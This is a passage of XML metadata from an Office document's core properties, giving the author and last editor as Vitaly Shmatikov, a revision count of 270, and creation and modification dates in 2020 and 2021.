  <dc:creator>Vitaly Shmatikov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vitaly Shmatikov</cp:lastModifiedBy>
  <cp:revision>270</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T21:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-23T01:06:21Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>